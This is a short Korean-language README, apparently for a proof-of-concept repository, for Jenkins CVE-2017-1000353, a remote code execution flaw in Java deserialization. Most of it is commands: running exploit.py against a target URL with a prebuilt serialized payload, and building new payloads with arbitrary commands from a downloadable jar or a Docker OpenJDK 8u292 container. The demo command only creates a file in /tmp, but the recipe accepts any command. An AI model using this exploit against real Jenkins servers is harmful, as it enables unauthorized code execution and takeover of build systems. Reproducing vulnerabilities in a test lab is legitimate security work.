
jenkins CVE-2017-1000353 POC
Jenkins CVE-2017-1000353을 어떻게 재현하나요?
이 저장소를 클론하고, 사전 빌드된 페이로드 jenkins_poc.ser를 다음 명령어와 함께 사용하세요:
python exploit.py http://your-ip:8080 jenkins_poc.ser
그러면 touch /tmp/success가 실행됩니다.
중요: 페이로드 생성은 Java 버전에 따라 달라집니다. openjdk:8u292에서 성공적으로 테스트되었습니다. 다른 Java 버전에서는 페이로드 생성 및 익스플로잇이 제대로 작동하지 않을 수 있습니다.
jenkins_poc.ser 페이로드를 어떻게 생성하나요?CVE-2017-1000353-SNAPSHOT-all.jar을 다운로드하세요.
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Docker를 사용하는 경우, 호환성을 보장하기 위해 다음 명령어를 사용할 수 있습니다:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"